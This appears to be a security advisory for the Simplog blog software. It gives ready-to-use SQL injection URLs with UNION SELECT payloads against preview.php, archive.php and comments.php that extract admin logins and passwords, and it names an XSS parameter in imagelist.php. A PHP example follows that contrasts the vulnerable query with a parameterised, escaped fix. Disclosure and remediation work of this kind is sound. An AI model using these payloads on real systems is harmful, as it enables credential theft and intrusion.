How&Example:
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]
EXAMPLE ->
http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1//UNION//SELECT//
concat(25552,login,25553,password,25554)//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1//UNION//SELECT//0,null,0,email,0,0,login,
password,0,admin,0//from//blog_users//where/**/admin=1/*
With these examples a remote attacker can leak the specified admin's login
information from the database.
XSS:
GET ->
http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]
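Added illustration, not Simplog's own source: the shape of the query behind the `tid`/`cid`/`pid`/`eid` lookups and the `blog_templates` table name are assumptions; it shows the unsafe pattern the URLs above exploit beside a hardened version (integer validation plus a bound parameter), and the output escaping that stops the `imagedir` reflection.

```php
<?php
// Assumed query shape (not Simplog's code): the id from the query string is
// pasted into the SQL text, so "-1 UNION SELECT ..." becomes part of the
// statement and rows from blog_users are returned in place of the template.
function get_template_unsafe(PDO $db, array $get): ?array
{
    $sql = "SELECT * FROM blog_templates WHERE tid = " . $get['tid'];
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: reject anything that is not a positive integer, then bind
// the value so it can never change the structure of the statement. The PDO
// connection should be created with PDO::ATTR_EMULATE_PREPARES => false so
// the server, not the driver, handles the parameter.
function get_template_safe(PDO $db, array $get): ?array
{
    $tid = filter_var(
        $get['tid'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($tid === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM blog_templates WHERE tid = :tid");
    $stmt->bindValue(':tid', $tid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Reflected parameter (imagedir in imagelist.php): encode it for the HTML
// context before it is written into the page instead of echoing it raw.
function render_imagedir(string $imagedir): string
{
    return '<p>Directory: '
        . htmlspecialchars($imagedir, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</p>';
}
```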
Timeline:
Original advisory can be found at: http://www.nukedx.com/?viewdoc=25